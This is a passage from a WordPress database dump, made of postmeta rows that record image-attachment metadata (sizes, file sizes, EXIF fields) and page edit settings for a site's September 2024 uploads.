arge\";a:5:{s:4:\"file\";s:48:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69119;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:215838;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:347089;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:48:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18722;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"3D568C24-BF80-4BF6-952F-A61B9BB91A08.jpg\";}'),
(2939,1095,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:55:\"2024/09/5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-scaled.jpg\";s:8:\"filesize\";i:461226;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14574;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107821;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8033;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67387;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206032;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:325139;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:48:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18163;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"5C13BDB5-B1D6-47A9-8A66-FC7F5CFEE97E.jpg\";}'),
(2940,1096,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:55:\"2024/09/89E33FD3-BD14-4973-B501-053D0C4343C4-scaled.jpg\";s:8:\"filesize\";i:452612;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"89E33FD3-BD14-4973-B501-053D0C4343C4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14611;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"89E33FD3-BD14-4973-B501-053D0C4343C4-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107785;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"89E33FD3-BD14-4973-B501-053D0C4343C4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8343;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"89E33FD3-BD14-4973-B501-053D0C4343C4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67486;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"89E33FD3-BD14-4973-B501-053D0C4343C4-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:204261;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"89E33FD3-BD14-4973-B501-053D0C4343C4-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:320297;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:48:\"89E33FD3-BD14-4973-B501-053D0C4343C4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17907;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"89E33FD3-BD14-4973-B501-053D0C4343C4.jpg\";}'),
(2941,1097,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:55:\"2024/09/471BF694-20D7-486D-A69A-0329EB0C5B7E-scaled.jpg\";s:8:\"filesize\";i:512249;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"471BF694-20D7-486D-A69A-0329EB0C5B7E-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14282;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"471BF694-20D7-486D-A69A-0329EB0C5B7E-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111839;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"471BF694-20D7-486D-A69A-0329EB0C5B7E-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8022;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"471BF694-20D7-486D-A69A-0329EB0C5B7E-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68722;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"471BF694-20D7-486D-A69A-0329EB0C5B7E-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218118;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"471BF694-20D7-486D-A69A-0329EB0C5B7E-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:353263;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:48:\"471BF694-20D7-486D-A69A-0329EB0C5B7E-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18289;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"471BF694-20D7-486D-A69A-0329EB0C5B7E.jpg\";}'),
(2942,1098,'_wp_attached_file','2024/09/S__69550086_0-1.jpg'),
(2943,1098,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2024/09/S__69550086_0-1.jpg\";s:8:\"filesize\";i:138585;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69550086_0-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21450;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69550086_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8952;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69550086_0-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97880;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69550086_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21126;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2944,1099,'_wp_attached_file','2024/09/S__69550088_0.jpg'),
(2945,1099,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2024/09/S__69550088_0.jpg\";s:8:\"filesize\";i:137677;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69550088_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21468;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69550088_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8862;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69550088_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97849;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69550088_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21109;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2946,1100,'_wp_attached_file','2024/09/S__69550089_0.jpg'),
(2947,1100,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2024/09/S__69550089_0.jpg\";s:8:\"filesize\";i:135610;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69550089_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21289;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69550089_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8860;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69550089_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96452;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69550089_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21006;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2949,1090,'_thumbnail_id','1091'),
(2950,1090,'_edit_last','1'),
(2951,1090,'title_style','default'),
(2952,1090,'_title_style','field_5d1a0217cf408'),
(2953,1090,'related',''),
(2954,1090,'_related','field_603b51c3e183e'),
(2955,1101,'title_style','default'),
(2956,1101,'_title_style','field_5d1a0217cf408'),
(2957,1101,'related',''),
(2958,1101,'_related','field_603b51c3e183e'),
(2959,1003,'_wp_page_template','default'),
(2960,1105,'_edit_lock','1725542948:1'),
(2961,1102,'wpforms_form_locations','a:1:{i:0;a:6:{s:4:\"type\";s:4:\"page\";s:5:\"title\";s:30:\"ทดสอบฟอร์ม\";s:7:\"form_id\";i:1102;s:2:\"id\";i:1105;s:6:\"status\";s:7:\"publish\";s:3:\"url\";s:14:\"/?page_id=1105\";}}'),
(2962,1105,'_edit_last','1'),
(2963,1105,'title_style','default'),
(2964,1105,'_title_style','field_5d1a0217cf408'),
(2965,1106,'title_style','default'),
(2966,1106,'_title_style','field_5d1a0217cf408'),
(2968,1108,'_edit_lock','1725588228:1'),
(2969,1109,'_wp_attached_file','2024/09/3923_0.jpg'),
(2970,1109,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3923_0.jpg\";s:8:\"filesize\";i:217068;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3923_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18339;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3923_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127669;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3923_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9303;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3923_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81357;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3923_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:232588;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3923_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23466;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2971,1110,'_wp_attached_file','2024/09/3925_0.jpg'),
(2972,1110,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3925_0.jpg\";s:8:\"filesize\";i:223929;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3925_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15523;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3925_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122525;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3925_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8229;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3925_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75308;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3925_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:233628;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3925_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19948;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2973,1111,'_wp_attached_file','2024/09/3926_0.jpg'),
(2974,1112,'_wp_attached_file','2024/09/3924_0.jpg'),
(2975,1111,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3926_0.jpg\";s:8:\"filesize\";i:239768;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3926_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17567;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3926_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134898;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3926_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8920;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3926_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84038;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3926_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:251732;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3926_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22261;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2976,1112,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3924_0.jpg\";s:8:\"filesize\";i:230560;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3924_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15855;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3924_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3924_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8360;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3924_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77005;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3924_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239615;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3924_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20537;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2977,1113,'_wp_attached_file','2024/09/3928_0.jpg'),
(2978,1113,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3928_0.jpg\";s:8:\"filesize\";i:324803;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3928_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17140;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3928_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162754;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3928_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8106;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3928_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96058;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3928_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324979;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3928_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22293;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2979,1114,'_wp_attached_file','2024/09/3927_0.jpg'),
(2980,1114,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3927_0.jpg\";s:8:\"filesize\";i:274404;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3927_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17612;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3927_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148402;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3927_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8583;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3927_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90327;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3927_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:283529;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3927_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22546;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2981,1115,'_wp_attached_file','2024/09/3929_0.jpg'),
